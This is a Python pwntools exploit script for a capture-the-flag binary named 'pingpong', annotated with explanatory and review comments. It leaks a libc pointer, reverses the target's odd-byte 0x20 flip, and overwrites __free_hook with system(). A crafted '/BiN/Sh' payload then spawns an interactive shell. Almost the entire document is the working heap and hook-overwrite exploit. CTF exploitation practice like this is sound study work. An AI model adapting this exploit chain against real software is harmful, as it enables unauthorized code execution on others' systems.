from pwn import *
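def xor(val):
    """Undo the target's alternating-byte flip on a leaked address.

    ``val`` is the ``hex()`` rendering of the leaked value, e.g.
    ``"0x7ffff7dd2620"``. The string is cut into 2-character chunks (the
    leading ``"0x"`` is chunk 0), chunks 1, 3, 5 and 7 have bit 0x20
    toggled (the same bit the target flips on every other byte -- see the
    ``"Aa"*28`` echo and the ``"/BiN/Sh"`` payload), and the result is
    parsed back into an int. For a 6-byte address only chunks 1, 3 and 5
    exist; chunk 7 only matters for a full 8-byte value.

    Returns the corrected address as an int. Raises ``ValueError`` if
    ``val`` is not a hex string.
    """
    chunks = [val[i:i + 2] for i in range(0, len(val), 2)]
    for i in (1, 3, 5, 7):
        if i >= len(chunks):
            break
        # "%02x" keeps both hex digits. Rendering the XOR result with hex()
        # dropped the leading zero whenever it fell below 0x10, which shifted
        # every following nibble and produced a wrong address.
        chunks[i] = "%02x" % (int(chunks[i], 16) ^ 0x20)
    return int("".join(chunks), 16)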
if __name__ == "__main__":
    # Local exploit driver for the "pingpong" challenge binary. Written
    # against Python 2 pwntools: on Python 3, r.recv() returns bytes and
    # bytes.ljust() rejects the str fill "\x00" used on the libc_stdout line.
    pwn_file = "./pingpong"
    libc_file = "./libc.so.6"
    pwn_elf = ELF(pwn_file)   # loaded but not used below
    r = process(pwn_file)
    libc_elf = ELF(libc_file)
    # Read from the libc symbol table but only logged; the hook address that
    # is actually used (free_hook) comes from the hard-coded 0x381418 below.
    free_hook_offset = libc_elf.symbols['__free_hook']
    # Every offset below is relative to system(), not to the libc base (see
    # the "stdout - system" / "binsh - system" comments). Which libc build
    # they were taken from is not recorded; re-derive them from libc_file
    # before reusing this script against another target.
    system_offset = 0x380290 # stdout - system
    one_gadget_offset = 0x45216   # unused: no payload references one_gadget
    binsh_offset = 0x1479c7 # binsh - system
    pop_rdi_offset = 0x0002155f   # unused: no ROP chain is built below
    log.info("free_hook's offset = {}".format(hex(free_hook_offset)))
    # Stage 1: leak. 56 'A' (0x41) are sent and the target is expected to
    # echo them back as "Aa"*28, i.e. with bit 0x20 flipped on every odd
    # byte; whatever follows that echo is treated as the leaked stdout pointer.
    r.sendlineafter("ping:", "A"*56)
    r.recvuntil("Aa"*28)
    # Drops the final byte (presumably a trailing newline) and zero-pads the
    # 6-byte pointer to 8. NOTE(review): assumes a single recv() returns the
    # whole leak; a short read would silently produce a wrong address.
    libc_stdout = u64(r.recv()[:-1].ljust(8,"\x00"))
    # The leaked bytes went through the same odd-byte flip; xor() undoes it.
    libc_stdout = xor(hex(libc_stdout))
    log.info("libc_stdout = {}".format(hex(libc_stdout)))
    libc_system = libc_stdout - system_offset
    log.info("libc_system = {}".format(hex(libc_system)))
    # Unused below. NOTE(review): this is system - 0x24b60, not the libc base,
    # yet one_gadget_offset (0x45216) is added to it as if it were
    # base-relative -- confirm before ever using one_gadget.
    libc_main = libc_system - 0x24b60
    log.info("libc_main = {}".format(hex(libc_main)))
    binsh = libc_system + binsh_offset   # unused below
    log.info("/bin/sh = {}".format(hex(binsh)))
    free_hook = libc_system + 0x381418
    log.info("free_hook = {}".format(hex(free_hook)))
    one_gadget = libc_main + one_gadget_offset   # unused below
    log.info("oneshot gadget = {}".format(hex(one_gadget)))
    # Stage 2: 152 bytes of filler, then a pointer 8 bytes below __free_hook.
    # Presumably the target uses this pointer as the destination of the next
    # write, so the next message's first 8 bytes land just before the hook
    # and its trailing p64 lands on the hook itself -- verify against the
    # binary.
    payload = "A"*152
    payload += p64(free_hook-0x8)
    r.sendline(payload)
    # Stage 3: "/BiN/Sh\x20" is chosen so the target's odd-byte ^0x20 turns
    # it into "/bin/sh\x00" (B->b, N->n, S->s, 0x20->0x00), followed by
    # system() as the new __free_hook. NOTE(review): nothing here protects
    # the p64 from the same odd-byte flip; presumably the target stops
    # flipping at the NUL produced at index 7 -- confirm against the binary.
    payload = "/BiN/Sh\x20"
    payload += p64(libc_system)
    r.sendline(payload)
    r.interactive()